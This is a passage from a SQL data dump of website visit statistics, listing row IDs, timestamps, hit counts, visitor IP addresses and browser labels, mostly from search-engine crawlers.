196.178.67','firefox'),(90934,1488286599,1,1,0,0,'164.132.161.84','other'),(90935,1488286702,1,1,0,0,'91.196.178.68','chrome'),(90936,1488286823,1,1,0,0,'91.196.178.168','other'),(90937,1488286945,1,1,0,0,'91.196.177.15','chrome'),(90938,1488287026,1,1,0,0,'157.55.39.123','other'),(90939,1488287033,1,1,0,0,'157.55.39.124','other'),(90940,1488287543,1,0,1,0,'66.249.75.183',''),(90941,1488287676,1,1,0,0,'91.196.178.72','firefox'),(90942,1488287717,1,1,0,0,'37.55.194.164','chrome'),(90943,1488288120,1,1,0,0,'94.178.6.11','chrome'),(90944,1488288667,1,1,0,0,'157.55.39.123','other'),(90945,1488288735,1,1,0,0,'108.59.8.70','other'),(90946,1488288969,1,1,0,0,'51.255.65.94','other'),(90947,1488289211,1,1,0,0,'91.196.178.72','firefox'),(90948,1488289259,1,0,1,0,'66.249.75.25',''),(90949,1488289363,1,1,0,0,'37.52.161.169','chrome'),(90950,1488289402,1,1,0,0,'51.255.65.81','other'),(90951,1488289487,1,1,0,0,'164.132.161.13','other'),(90952,1488290210,1,0,1,0,'66.249.75.22',''),(90953,1488290474,1,1,0,0,'37.204.82.160','msie'),(90954,1488290611,1,1,0,0,'164.132.161.40','other'),(90955,1488290880,1,1,0,0,'51.255.65.10','other'),(90956,1488291608,1,1,0,0,'188.244.45.43','msie'),(90957,1488291637,1,1,0,0,'51.255.65.4','other'),(90958,1488291682,1,1,0,0,'51.255.65.30','other'),(90959,1488291751,1,1,0,0,'95.28.163.128','msie'),(90960,1488291909,1,1,0,0,'185.165.168.196','chrome'),(90961,1488292583,1,1,0,0,'164.132.161.47','other'),(90962,1488292778,1,1,0,0,'94.179.9.104','firefox'),(90963,1488292829,1,1,0,0,'37.55.194.164','chrome'),(90964,1488292968,1,1,0,0,'164.132.161.49','other'),(90965,1488293752,1,1,0,0,'46.229.168.70','other'),(90966,1488293753,1,1,0,0,'37.55.194.164','chrome'),(90967,1488293769,2,2,0,0,'46.229.168.69','other'),(90968,1488293794,1,1,0,0,'46.229.168.65','other'),(90969,1488293798,1,0,1,0,'66.249.75.179',''),(90970,1488293808,4,4,0,0,'46.229.168.72','other'),(90971,1488293892,1,1,0,0,'46.229.168.75','other'),(90972,1488294051,1,1,0,0,'91.196.178.166','chrome'),(90973,1488294320,1,1,0,0,'91.196.178.68','firefox'),(90974,1488294401,1,0,1,0,'66.249.75.187',''),(90975,1488295080,1,1,0,0,'51.255.65.68','other'),(90976,1488295491,1,1,0,0,'164.132.161.42','other'),(90977,1488296012,2,2,0,0,'94.179.61.27','firefox'),(90978,1488296297,1,1,0,0,'180.76.15.27','other'),(90979,1488296589,1,1,0,0,'66.249.69.202','chrome'),(90980,1488296628,1,1,0,0,'95.221.228.60','msie'),(90981,1488297966,1,1,0,0,'91.196.178.162','chrome'),(90982,1488299355,1,1,0,0,'157.55.39.122','other'),(90983,1488299815,1,1,0,0,'157.55.39.124','other'),(90984,1488300289,1,1,0,0,'46.48.13.161','chrome'),(90985,1488301037,2,1,1,0,'66.249.64.79',''),(90986,1488301164,1,0,1,0,'66.249.64.179',''),(90987,1488301211,1,1,0,0,'141.8.142.58','other'),(90988,1488301215,1,1,0,0,'5.255.253.67','other'),(90989,1488301218,1,1,0,0,'93.158.152.40','other'),(90990,1488301222,1,1,0,0,'130.193.51.14','other'),(90991,1488301260,1,1,0,0,'91.124.82.217','firefox'),(90992,1488302079,1,0,1,0,'66.249.64.74',''),(90993,1488302296,1,1,0,0,'157.55.39.122','other'),(90994,1488303873,1,1,0,0,'94.179.70.16','chrome'),(90995,1488304677,1,1,0,0,'141.8.142.67','other'),(90996,1488304681,1,1,0,0,'141.8.183.25','other'),(90997,1488304934,1,0,1,0,'66.249.64.69',''),(90998,1488305345,1,1,0,0,'51.15.10.29','chrome'),(90999,1488305997,1,1,0,0,'66.249.64.179','chrome'),(91000,1488306394,1,0,1,0,'66.249.64.74',''),(91001,1488306768,2,2,0,0,'91.196.178.133','chrome'),(91002,1488307951,1,0,1,0,'66.249.64.79',''),(91003,1488309319,1,1,0,0,'157.55.39.123','other'),(91004,1488309563,1,1,0,0,'37.55.56.173','chrome'),(91005,1488310956,1,1,0,0,'66.249.64.74','chrome'),(91006,1488311904,1,0,1,0,'68.180.229.99',''),(91007,1488312692,1,0,1,0,'66.249.64.74',''),(91008,1488313775,1,1,0,0,'164.132.161.83','other'),(91009,1488314340,1,0,1,0,'66.249.64.69',''),(91010,1488315019,1,1,0,0,'107.21.1.8','other'),(91011,1488315449,1,1,0,0,'91.196.178.39','chrome'),(91012,1488315517,1,1,0,0,'51.255.65.60','other'),(91013,1488315564,1,0,1,0,'66.249.64.183',''),(91014,1488316125,1,0,1,0,'66.249.64.187',''),(91015,1488316738,1,0,1,0,'66.249.64.79',''),(91016,1488317536,1,0,1,0,'66.249.64.183',''),(91017,1488317666,1,0,1,0,'66.249.64.187',''),(91018,1488317977,1,1,0,0,'164.132.161.21','other'),(91019,1488320875,1,1,0,0,'163.172.64.224','other'),(91020,1488321140,1,1,0,0,'180.76.15.142','other'),(91021,1488321190,1,0,1,0,'66.249.64.179',''),(91022,1488321675,1,1,0,0,'51.255.65.44','other'),(91023,1488321932,1,1,0,0,'130.193.50.38','other'),(91024,1488322451,1,1,0,0,'164.132.161.5','other'),(91025,1488327784,1,0,1,0,'66.249.64.59',''),(91026,1488328330,1,1,0,0,'51.255.65.83','other'),(91027,1488328724,1,1,0,0,'164.132.161.14','other'),(91028,1488329233,1,1,0,0,'157.55.39.124','other'),(91029,1488329308,1,0,1,0,'66.249.64.59',''),(91030,1488330171,1,1,0,0,'164.132.161.5','other'),(91031,1488330289,1,0,1,0,'66.249.64.61',''),(91032,1488330478,1,0,1,0,'66.249.64.59',''),(91033,1488330521,1,0,1,0,'66.249.64.187',''),(91034,1488331075,1,1,0,0,'164.132.161.68','other'),(91035,1488332031,1,1,0,0,'164.132.161.77','other'),(91036,1488332615,1,1,0,0,'163.172.64.248','other'),(91037,1488333185,1,1,0,0,'51.255.65.58','other'),(91038,1488334523,1,1,0,0,'164.132.161.8','other'),(91039,1488335697,1,1,0,0,'164.132.161.74','other'),(91040,1488336060,1,0,1,0,'66.249.64.183',''),(91041,1488336673,1,0,1,0,'66.249.64.179',''),(91042,1488336859,1,0,1,0,'66.249.64.187',''),(91043,1488337826,1,1,0,0,'66.249.64.183','chrome'),(91044,1488338145,1,0,1,0,'66.249.64.179',''),(91045,1488339562,1,0,1,0,'66.249.64.179',''),(91046,1488340377,1,0,1,0,'66.249.64.57',''),(91047,1488340549,1,0,1,0,'66.249.64.183',''),(91048,1488341189,1,1,0,0,'51.255.65.76','other'),(91049,1488342184,1,1,0,0,'164.132.161.42','other'),(91050,1488342218,1,1,0,0,'51.255.65.85','other'),(91051,1488342645,1,1,0,0,'207.46.13.114','other'),(91052,1488344033,1,1,0,0,'164.132.161.32','other'),(91053,1488344683,1,1,0,0,'51.255.65.94','other'),(91054,1488345910,1,1,0,0,'164.132.161.73','other'),(91055,1488345940,1,1,0,0,'164.132.161.49','other'),(91056,1488346466,1,1,0,0,'51.255.65.60','other'),(91057,1488348232,1,0,1,0,'68.180.229.99',''),(91058,1488348316,1,1,0,0,'128.72.4.246','msie'),(91059,1488349004,1,1,0,0,'91.200.12.49','chrome'),(91060,1488349067,1,0,1,0,'66.249.64.61',''),(91061,1488349502,1,1,0,0,'51.15.10.29','chrome'),(91062,1488349962,1,0,1,0,'68.180.229.99',''),(91063,1488350765,1,1,0,0,'66.249.93.156','chrome'),(91064,1488350801,1,1,0,0,'91.196.178.66','chrome'),(91065,1488351010,1,1,0,0,'164.132.161.62','other'),(91066,1488351338,1,1,0,0,'91.196.178.68','chrome'),(91067,1488351369,1,1,0,0,'176.109.201.15','firefox'),(91068,1488351385,1,1,0,0,'141.8.142.58','other'),(91069,1488351716,1,1,0,0,'193.194.127.217','firefox'),(91070,1488351812,1,1,0,0,'141.8.183.25','other'),(91071,1488351879,1,1,0,0,'91.196.178.66','chrome'),(91072,1488352177,1,1,0,0,'91.196.177.46','chrome'),(91073,1488352624,1,1,0,0,'91.196.178.68','firefox'),(91074,1488352723,1,1,0,0,'51.255.65.55','other'),(91075,1488352851,1,1,0,0,'51.255.65.64','other'),(91076,1488352854,1,1,0,0,'91.196.178.72','firefox'),(91077,1488353385,1,1,0,0,'164.132.161.44','other'),(91078,1488353656,1,1,0,0,'91.196.178.66','chrome'),(91079,1488354034,1,1,0,0,'93.183.216.251','chrome'),(91080,1488354051,1,1,0,0,'141.8.183.19','other'),(91081,1488354120,1,1,0,0,'93.158.152.84','other'),(91082,1488354748,1,1,0,0,'213.179.234.133','chrome'),(91083,1488355243,1,0,1,0,'66.249.64.187',''),(91084,1488355310,2,0,2,0,'66.249.64.57',''),(91085,1488355416,1,1,0,0,'51.255.65.79','other'),(91086,1488355525,1,1,0,0,'163.172.64.234','other'),(91087,1488355794,1,1,0,0,'164.132.161.9','other'),(91088,1488356592,1,1,0,0,'94.179.67.29','chrome'),(91089,1488356671,1,1,0,0,'130.193.50.6','other'),(91090,1488356963,1,1,0,0,'130.193.50.34','other'),(91091,1488357252,1,1,0,0,'37.147.226.233','msie'),(91092,1488357288,1,1,0,0,'91.196.178.70','chrome'),(91093,1488357443,1,1,0,0,'163.172.71.225','other'),(91094,1488358142,1,1,0,0,'141.8.132.10','other'),(91095,1488358145,1,1,0,0,'141.8.142.25','other'),(91096,1488358149,1,1,0,0,'93.158.152.40','other'),(91097,1488358758,1,1,0,0,'77.93.63.132','firefox'),(91098,1488358914,1,1,0,0,'93.158.152.84','other'),(91099,1488359229,1,1,0,0,'141.8.142.62','other'),(91100,1488359688,1,0,1,0,'66.249.64.183',''),(91101,1488360045,1,1,0,0,'66.249.64.61','chrome'),(91102,1488360373,1,1,0,0,'91.196.178.66','chrome'),(91103,1488361938,1,1,0,0,'91.196.178.72','firefox'),(91104,1488362190,1,1,0,0,'51.255.65.14','other'),(91105,1488362197,1,1,0,0,'37.54.98.204','msie'),(91106,1488362442,1,1,0,0,'141.8.142.85','other'),(91107,1488362971,2,2,0,0,'91.124.181.225','chrome'),(91108,1488363400,1,1,0,0,'51.255.65.7','other'),(91109,1488363532,1,1,0,0,'164.132.161.66','other'),(91110,1488363715,1,1,0,0,'91.196.178.72','firefox'),(91111,1488363891,1,0,1,0,'66.249.64.59',''),(91112,1488363921,1,1,0,0,'91.196.178.67','firefox'),(91113,1488364112,1,0,1,0,'66.249.64.187',''),(91114,1488364372,1,1,0,0,'130.193.50.34','other'),(91115,1488364377,1,1,0,0,'141.8.142.175','other'),(91116,1488364484,1,0,1,0,'66.249.64.61',''),(91117,1488364792,1,1,0,0,'163.172.64.181','other'),(91118,1488364920,1,0,1,0,'66.249.64.179',''),(91119,1488365077,1,1,0,0,'46.133.107.103','firefox'),(91120,1488367125,2,0,2,0,'66.249.64.183',''),(91121,1488367660,1,1,0,0,'164.132.161.67','other'),(91122,1488367789,1,0,1,0,'66.249.64.59',''),(91123,1488368508,1,1,0,0,'117.214.34.94','firefox'),(91124,1488368635,1,0,1,0,'66.249.64.183',''),(91125,1488368727,1,1,0,0,'157.55.39.120','other'),(91126,1488369147,1,1,0,0,'164.132.161.15','other'),(91127,1488369197,1,1,0,0,'180.76.15.31','other'),(91128,1488369490,2,0,2,0,'66.249.64.57',''),(91129,1488369745,1,1,0,0,'164.132.161.37','other'),(91130,1488369853,1,1,0,0,'199.58.86.209','other'),(91131,1488369855,1,1,0,0,'95.84.219.98','msie'),(91132,1488371293,1,1,0,0,'157.55.39.123','other'),(91133,1488371738,1,1,0,0,'91.196.178.68','firefox'),(91134,1488372017,1,1,0,0,'164.132.161.41','other'),(91135,1488372297,1,1,0,0,'163.172.71.90','other'),(91136,1488372608,1,1,0,0,'91.196.178.72','firefox'),(91137,1488372860,1,1,0,0,'91.196.178.70','chrome'),(91138,1488373279,1,1,0,0,'213.108.45.138','chrome'),(91139,1488373363,1,1,0,0,'163.172.64.254','other'),(91140,1488373757,1,1,0,0,'91.196.177.26','chrome'),(91141,1488373851,1,1,0,0,'46.133.107.103','firefox'),(91142,1488374012,1,1,0,0,'178.93.24.193','chrome'),(91143,1488374633,3,3,0,0,'91.196.178.72','firefox'),(91144,1488374781,1,0,1,0,'66.249.64.179',''),(91145,1488374807,1,1,0,0,'178.94.52.116','chrome'),(91146,1488374849,1,0,1,0,'66.249.64.61',''),(91147,1488375157,1,1,0,0,'37.52.28.145','chrome'),(91148,1488375188,1,1,0,0,'141.8.142.62','other'),(91149,1488375624,1,1,0,0,'91.209.11.178','chrome'),(91150,1488376201,1,1,0,0,'94.179.80.165','firefox'),(91151,1488376905,1,1,0,0,'91.196.178.68','chrome'),(91152,1488377976,1,1,0,0,'164.132.161.33','other'),(91153,1488378040,1,0,1,0,'68.180.229.99',''),(91154,1488378060,1,1,0,0,'164.132.161.89','other'),(91155,1488378291,1,1,0,0,'91.196.178.163','chrome'),(91156,1488378867,1,1,0,0,'80.91.188.67','firefox'),(91157,1488379743,1,1,0,0,'37.52.24.122','chrome'),(91158,1488379761,1,1,0,0,'51.255.65.72','other'),(91159,1488379820,1,1,0,0,'91.196.178.67','firefox'),(91160,1488379951,1,1,0,0,'91.196.178.72','firefox'),(91161,1488380005,1,0,1,0,'66.249.64.187',''),(91162,1488380165,1,1,0,0,'207.46.13.114','other'),(91163,1488380295,1,0,1,0,'66.249.64.59',''),(91164,1488380403,1,1,0,0,'91.196.178.66','msie'),(91165,1488381069,1,1,0,0,'163.172.64.186','other'),(91166,1488381159,1,1,0,0,'37.204.48.174','opera'),(91167,1488381567,1,1,0,0,'51.255.65.85','other'),(91168,1488381870,1,0,1,0,'68.180.229.99',''),(91169,1488382239,1,1,0,0,'193.194.127.217','firefox'),(91170,1488383974,1,1,0,0,'51.255.65.47','other'),(91171,1488384927,1,1,0,0,'164.132.161.72','other'),(91172,1488386344,1,1,0,0,'163.172.64.217','other'),(91173,1488387314,1,1,0,0,'164.132.161.48','other'),(91174,1488387631,1,1,0,0,'157.55.39.124','other'),(91175,1488387684,1,1,0,0,'91.196.178.33','chrome'),(91176,1488387727,1,0,1,0,'66.249.75.179',''),(91177,1488388372,1,1,0,0,'91.200.12.49','chrome'),(91178,1488388999,1,0,1,0,'66.249.69.149',''),(91179,1488389139,1,0,1,0,'66.249.75.183',''),(91180,1488389640,1,1,0,0,'157.55.39.120','other'),(91181,1488390084,1,1,0,0,'51.255.65.60','other'),(91182,1488390484,1,1,0,0,'51.255.65.58','other'),(91183,1488391117,1,1,0,0,'194.44.244.130','chrome'),(91184,1488391430,1,0,1,0,'66.249.69.52',''),(91185,1488391891,1,1,0,0,'207.46.13.89','other'),(91186,1488392230,1,1,0,0,'164.132.161.72','other'),(91187,1488394412,1,1,0,0,'91.196.178.34','chrome'),(91188,1488395052,1,1,0,0,'51.255.65.26','other'),(91189,1488395128,1,1,0,0,'130.193.51.43','other'),(91190,1488395587,1,1,0,0,'109.63.240.30','msie'),(91191,1488396154,1,1,0,0,'94.179.114.41','firefox'),(91192,1488396331,1,1,0,0,'207.46.13.89','other'),(91193,1488396884,1,1,0,0,'164.132.161.97','other'),(91194,1488397437,1,1,0,0,'164.132.161.93','other'),(91195,1488398225,1,1,0,0,'77.122.218.226','chrome'),(91196,1488399387,1,1,0,0,'163.172.64.241','other'),(91197,1488399938,1,1,0,0,'46.211.136.247','chrome'),(91198,1488400153,1,1,0,0,'77.41.25.174','msie'),(91199,1488400991,1,1,0,0,'82.207.113.219','chrome'),(91200,1488406167,1,1,0,0,'207.46.13.50','other'),(91201,1488406856,1,1,0,0,'164.132.161.4','other'),(91202,1488409034,1,1,0,0,'51.255.65.7','other'),(91203,1488409366,1,1,0,0,'95.221.252.199','chrome'),(91204,1488410454,1,1,0,0,'51.255.65.11','other'),(91205,1488410702,1,1,0,0,'163.172.64.230','other'),(91206,1488410811,1,1,0,0,'157.55.39.124','other'),(91207,1488411784,1,1,0,0,'164.132.161.18','other'),(91208,1488412045,1,1,0,0,'163.172.64.182','other'),(91209,1488414153,1,1,0,0,'51.255.65.63','other'),(91210,1488414243,1,1,0,0,'79.164.157.95','chrome'),(91211,1488414647,1,0,1,0,'66.249.69.234',''),(91212,1488415528,1,1,0,0,'37.55.23.87','chrome'),(91213,1488416101,1,0,1,0,'66.249.69.202',''),(91214,1488416405,1,1,0,0,'51.255.65.69','other'),(91215,1488416456,1,1,0,0,'163.172.64.190','other'),(91216,1488417302,1,0,1,0,'66.249.69.52',''),(91217,1488417990,1,1,0,0,'180.76.15.134','other'),(91218,1488418198,1,0,1,0,'66.249.69.56',''),(91219,1488420488,1,1,0,0,'80.64.173.162','other'),(91220,1488420605,1,0,1,0,'66.249.69.202',''),(91221,1488422553,1,1,0,0,'128.72.230.132','chrome'),(91222,1488423394,3,3,0,0,'80.64.173.162','other'),(91223,1488423566,2,2,0,0,'91.200.12.103','msie'),(91224,1488424448,1,0,1,0,'66.249.69.197',''),(91225,1488425011,1,1,0,0,'51.255.65.67','other'),(91226,1488425445,1,1,0,0,'207.46.13.89','other'),(91227,1488426472,1,1,0,0,'95.221.236.5','firefox'),(91228,1488426603,1,1,0,0,'164.132.161.6','other'),(91229,1488426972,1,1,0,0,'176.104.81.181','chrome'),(91230,1488426983,1,1,0,0,'178.154.149.10','other'),(91231,1488429632,1,1,0,0,'51.255.65.14','other'),(91232,1488429717,1,1,0,0,'51.255.65.89','other'),(91233,1488430079,1,1,0,0,'51.255.65.40','other'),(91234,1488430552,2,2,0,0,'66.249.69.197','chrome'),(91235,1488431036,1,0,1,0,'66.249.69.52',''),(91236,1488432219,1,1,0,0,'51.255.65.15','other'),(91237,1488432537,1,1,0,0,'178.137.83.166','chrome'),(91238,1488432758,1,1,0,0,'91.196.178.68','firefox'),(91239,1488433019,1,1,0,0,'207.46.13.193','other'),(91240,1488434646,5,5,0,0,'62.210.250.212','other'),(91241,1488434853,1,1,0,0,'91.196.178.72','firefox'),(91242,1488435153,1,1,0,0,'180.76.15.142','other'),(91243,1488435327,1,1,0,0,'91.196.178.66','firefox'),(91244,1488435337,1,1,0,0,'51.255.65.22','other'),(91245,1488435641,1,1,0,0,'92.113.174.61','chrome'),(91246,1488435968,2,2,0,0,'91.196.178.72','firefox'),(91247,1488436260,1,1,0,0,'164.132.161.50','other'),(91248,1488436873,1,1,0,0,'91.196.178.72','firefox'),(91249,1488437203,1,1,0,0,'91.196.178.66','chrome'),(91250,1488437536,1,1,0,0,'141.0.12.139','chrome'),(91251,1488437573,1,1,0,0,'37.54.5.9','chrome'),(91252,1488438128,1,1,0,0,'91.196.178.66','chrome'),(91253,1488438151,1,1,0,0,'178.140.117.178','msie'),(91254,1488438597,1,1,0,0,'91.196.178.71','chrome'),(91255,1488438612,1,1,0,0,'130.193.50.34','other'),(91256,1488438722,1,0,1,0,'66.249.69.60',''),(91257,1488439174,1,1,0,0,'66.249.93.13','chrome'),(91258,1488439288,1,0,1,0,'66.249.69.202',''),(91259,1488439559,1,1,0,0,'51.255.65.53','other'),(91260,1488439707,1,1,0,0,'78.111.190.247','firefox'),(91261,1488440423,1,1,0,0,'51.255.65.33','other'),(91262,1488440432,1,1,0,0,'91.196.178.134','firefox'),(91263,1488441009,1,1,0,0,'91.196.178.66','firefox'),(91264,1488441659,1,1,0,0,'91.196.177.26','chrome'),(91265,1488442060,1,1,0,0,'37.53.15.123','chrome'),(91266,1488443427,1,1,0,0,'5.196.1.129','chrome'),(91267,1488444110,1,1,0,0,'207.46.13.89','other'),(91268,1488444381,1,0,1,0,'66.249.69.210',''),(91269,1488445276,1,1,0,0,'91.196.178.70','chrome'),(91270,1488446049,1,1,0,0,'193.200.33.140','msie'),(91271,1488446499,1,1,0,0,'207.46.13.193','other'),(91272,1488446656,1,1,0,0,'91.196.178.72','firefox'),(91273,1488446758,1,1,0,0,'37.53.132.83','chrome'),(91274,1488448197,1,1,0,0,'46.174.241.60','chrome'),(91275,1488448425,1,1,0,0,'66.249.69.202','chrome'),(91276,1488449287,1,1,0,0,'95.132.129.226','chrome'),(91277,1488449815,1,1,0,0,'51.255.65.19','other'),(91278,1488450787,1,1,0,0,'164.132.161.64','other'),(91279,1488451379,1,1,0,0,'46.201.225.169','chrome'),(91280,1488451656,1,1,0,0,'66.249.69.52','chrome'),(91281,1488452037,1,1,0,0,'91.196.177.15','chrome'),(91282,1488452090,1,1,0,0,'163.172.64.226','other'),(91283,1488452288,1,1,0,0,'164.132.161.34','other'),(91284,1488452454,1,1,0,0,'37.204.82.160','msie'),(91285,1488453121,1,1,0,0,'94.179.4.22','chrome'),(91286,1488453750,1,1,0,0,'91.196.178.72','firefox'),(91287,1488453781,1,1,0,0,'164.132.161.24','other'),(91288,1488454885,1,1,0,0,'95.84.183.194','msie'),(91289,1488454920,1,1,0,0,'51.255.65.70','other'),(91290,1488455074,1,1,0,0,'37.54.21.226','chrome'),(91291,1488455140,1,1,0,0,'91.196.178.163','chrome'),(91292,1488455369,1,1,0,0,'128.69.158.170','msie'),(91293,1488456197,1,1,0,0,'164.132.161.46','other'),(91294,1488456548,1,1,0,0,'51.255.65.38','other'),(91295,1488457066,1,1,0,0,'207.46.13.195','other'),(91296,1488457490,1,1,0,0,'95.132.129.226','chrome'),(91297,1488457592,1,1,0,0,'207.46.13.193','other'),(91298,1488458417,1,1,0,0,'163.172.64.230','other'),(91299,1488459030,1,1,0,0,'163.172.64.239','other'),(91300,1488459611,1,1,0,0,'51.255.65.15','other'),(91301,1488460645,1,1,0,0,'163.172.64.239','other'),(91302,1488460975,1,1,0,0,'66.249.69.197','chrome'),(91303,1488461402,1,1,0,0,'82.145.222.3','chrome'),(91304,1488462052,1,1,0,0,'91.196.177.46','firefox'),(91305,1488462655,1,1,0,0,'178.255.215.94','other'),(91306,1488462918,1,1,0,0,'46.200.42.85','chrome'),(91307,1488465056,1,1,0,0,'51.255.65.59','other'),(91308,1488465863,1,1,0,0,'185.51.74.208','firefox'),(91309,1488466203,1,1,0,0,'91.196.178.66','chrome'),(91310,1488467061,1,1,0,0,'37.54.79.86','firefox'),(91311,1488467099,1,1,0,0,'95.133.69.156','firefox'),(91312,1488467863,1,1,0,0,'130.180.211.133','firefox'),(91313,1488469652,1,1,0,0,'164.132.161.71','other'),(91314,1488469832,1,1,0,0,'207.46.13.195','other'),(91315,1488471780,1,1,0,0,'130.193.50.34','other'),(91316,1488471784,1,1,0,0,'207.46.13.89','other'),(91317,1488472319,1,1,0,0,'164.132.161.38','other'),(91318,1488474088,1,1,0,0,'94.178.6.10','firefox'),(91319,1488474346,1,1,0,0,'62.212.73.211','other'),(91320,1488474360,1,1,0,0,'91.196.178.39','chrome'),(91321,1488474397,1,1,0,0,'178.92.85.183','chrome'),(91322,1488475522,1,1,0,0,'94.179.77.216','firefox'),(91323,1488475567,1,1,0,0,'51.255.65.3','other'),(91324,1488475986,1,1,0,0,'164.132.161.41','other'),(91325,1488476596,1,1,0,0,'91.200.12.49','chrome'),(91326,1488476875,1,1,0,0,'164.132.161.30','other'),(91327,1488477930,1,1,0,0,'46.211.70.60','chrome'),(91328,1488478638,1,1,0,0,'163.172.64.253','other'),(91329,1488478713,1,1,0,0,'164.132.161.15','other'),(91330,1488479265,1,1,0,0,'91.196.178.72','firefox'),(91331,1488479488,1,1,0,0,'94.179.53.27','chrome'),(91332,1488480487,1,1,0,0,'31.13.102.110','other'),(91333,1488481912,1,1,0,0,'91.196.178.162','chrome'),(91334,1488484054,1,1,0,0,'51.255.65.37','other'),(91335,1488484202,1,1,0,0,'164.132.161.60','other'),(91336,1488484305,1,1,0,0,'69.30.198.186','other'),(91337,1488484454,2,2,0,0,'207.46.13.50','other'),(91338,1488484808,1,0,1,0,'66.249.66.180',''),(91339,1488484906,1,1,0,0,'91.196.177.11','other'),(91340,1488485560,1,1,0,0,'164.132.161.17','other'),(91341,1488485896,1,1,0,0,'66.249.66.180','chrome'),(91342,1488487126,1,1,0,0,'164.132.161.20','other'),(91343,1488487604,1,1,0,0,'207.46.13.193','other'),(91344,1488488036,1,1,0,0,'207.46.13.89','other'),(91345,1488488126,1,1,0,0,'164.132.161.34','other'),(91346,1488488412,1,1,0,0,'207.46.13.50','other'),(91347,1488489396,1,1,0,0,'51.255.65.92','other'),(91348,1488489748,1,1,0,0,'163.172.64.232','other'),(91349,1488490957,1,1,0,0,'164.132.161.23','other'),(91350,1488491266,1,1,0,0,'51.255.65.40','other'),(91351,1488492298,1,1,0,0,'51.255.65.37','other'),(91352,1488493593,1,1,0,0,'46.165.197.141','other'),(91353,1488493868,1,1,0,0,'164.132.161.73','other'),(91354,1488494947,1,1,0,0,'207.46.13.50','other'),(91355,1488496354,1,1,0,0,'163.172.64.241','other'),(91356,1488496480,1,1,0,0,'180.76.15.163','other'),(91357,1488497467,1,1,0,0,'163.172.64.247','other'),(91358,1488497540,1,1,0,0,'163.172.64.236','other'),(91359,1488497930,1,1,0,0,'51.255.65.23','other'),(91360,1488499745,1,1,0,0,'164.132.161.10','other'),(91361,1488499818,1,1,0,0,'164.132.161.12','other'),(91362,1488500242,1,0,1,0,'66.249.66.84',''),(91363,1488500307,1,0,1,0,'66.249.66.183',''),(91364,1488500379,1,1,0,0,'163.172.64.225','other'),(91365,1488500867,1,0,1,0,'66.249.66.81',''),(91366,1488500875,1,1,0,0,'66.249.66.81','chrome'),(91367,1488501027,1,1,0,0,'180.76.15.138','other'),(91368,1488501085,1,1,0,0,'163.172.64.223','other'),(91369,1488501112,1,1,0,0,'164.132.161.5','other'),(91370,1488502886,1,0,1,0,'66.249.66.183',''),(91371,1488504150,1,0,1,0,'66.249.66.97',''),(91372,1488505489,1,1,0,0,'66.249.66.84','chrome'),(91373,1488507517,1,1,0,0,'66.249.66.183','chrome'),(91374,1488508590,1,0,1,0,'66.249.66.180',''),(91375,1488511168,1,1,0,0,'141.8.183.25','other'),(91376,1488512397,1,1,0,0,'91.200.12.49','chrome'),(91377,1488512874,1,1,0,0,'141.8.142.61','other'),(91378,1488512936,1,0,1,0,'66.249.66.81',''),(91379,1488513005,1,1,0,0,'141.8.183.19','other'),(91380,1488513853,1,1,0,0,'141.8.142.67','other'),(91381,1488514354,1,1,0,0,'141.8.183.19','other'),(91382,1488515705,1,1,0,0,'93.158.152.61','other'),(91383,1488515734,1,0,1,0,'66.249.66.84',''),(91384,1488518186,1,1,0,0,'130.193.50.34','other'),(91385,1488518574,1,1,0,0,'93.158.152.61','other'),(91386,1488518629,1,1,0,0,'51.255.65.79','other'),(91387,1488518997,1,1,0,0,'91.196.178.72','firefox'),(91388,1488519904,1,1,0,0,'164.132.161.84','other'),(91389,1488520050,1,1,0,0,'163.172.64.228','other'),(91390,1488520373,1,1,0,0,'164.132.161.72','other'),(91391,1488521438,1,1,0,0,'130.180.217.127','chrome'),(91392,1488522218,1,1,0,0,'62.210.251.247','other'),(91393,1488522274,1,1,0,0,'141.8.142.61','other'),(91394,1488522279,2,2,0,0,'130.193.50.6','other'),(91395,1488522289,1,1,0,0,'91.196.178.66','chrome'),(91396,1488523384,1,0,1,0,'66.249.66.177',''),(91397,1488524211,1,1,0,0,'66.249.66.81','chrome'),(91398,1488524238,1,1,0,0,'66.249.66.183','chrome'),(91399,1488525674,1,1,0,0,'163.172.71.21','other'),(91400,1488527370,1,1,0,0,'164.132.161.93','other'),(91401,1488527741,2,2,0,0,'91.196.178.68','chrome'),(91402,1488528442,1,0,1,0,'66.249.66.87',''),(91403,1488529450,1,1,0,0,'91.196.178.39','firefox'),(91404,1488529857,1,1,0,0,'51.255.65.34','other'),(91405,1488530664,1,1,0,0,'46.133.106.246','firefox'),(91406,1488530793,1,1,0,0,'164.132.161.16','other'),(91407,1488531350,1,1,0,0,'91.196.178.65','firefox'),(91408,1488531370,1,1,0,0,'51.255.65.66','other'),(91409,1488531371,1,1,0,0,'95.134.223.113','chrome'),(91410,1488532264,1,1,0,0,'66.249.66.87','chrome'),(91411,1488532265,1,1,0,0,'66.249.66.180','chrome'),(91412,1488532657,1,1,0,0,'37.54.192.6','chrome'),(91413,1488532804,1,1,0,0,'51.255.65.79','other'),(91414,1488533784,1,1,0,0,'95.133.48.91','firefox'),(91415,1488534283,1,1,0,0,'51.255.65.20','other'),(91416,1488534973,1,1,0,0,'164.132.161.55','other'),(91417,1488535102,1,1,0,0,'180.76.15.155','other'),(91418,1488535181,1,1,0,0,'141.8.183.25','other'),(91419,1488535203,1,1,0,0,'141.8.142.175','other'),(91420,1488535863,1,1,0,0,'94.179.15.154','chrome'),(91421,1488535935,1,1,0,0,'94.179.9.11','firefox'),(91422,1488536115,1,0,1,0,'66.249.66.180',''),(91423,1488536785,1,1,0,0,'193.8.46.59','firefox'),(91424,1488537005,1,0,1,0,'66.249.66.177',''),(91425,1488537034,1,1,0,0,'51.255.65.39','other'),(91426,1488537191,1,1,0,0,'164.132.161.69','other'),(91427,1488537682,1,0,1,0,'66.249.66.81',''),(91428,1488537923,1,1,0,0,'66.249.66.177','chrome'),(91429,1488537929,1,1,0,0,'66.249.66.84','chrome'),(91430,1488537964,1,1,0,0,'130.180.219.167','firefox'),(91431,1488538021,1,1,0,0,'46.211.136.219','chrome'),(91432,1488538373,1,1,0,0,'193.8.46.59','firefox'),(91433,1488538556,2,2,0,0,'46.165.197.142','other'),(91434,1488538904,2,2,0,0,'92.238.226.245','other'),(91435,1488538932,1,1,0,0,'46.166.199.137','firefox'),(91436,1488539090,1,0,1,0,'66.249.66.84',''),(91437,1488539156,1,1,0,0,'37.54.21.104','chrome'),(91438,1488539602,2,2,0,0,'176.36.80.39','other'),(91439,1488539842,1,1,0,0,'51.255.65.14','other'),(91440,1488540464,1,1,0,0,'164.132.161.43','other'),(91441,1488540786,1,1,0,0,'51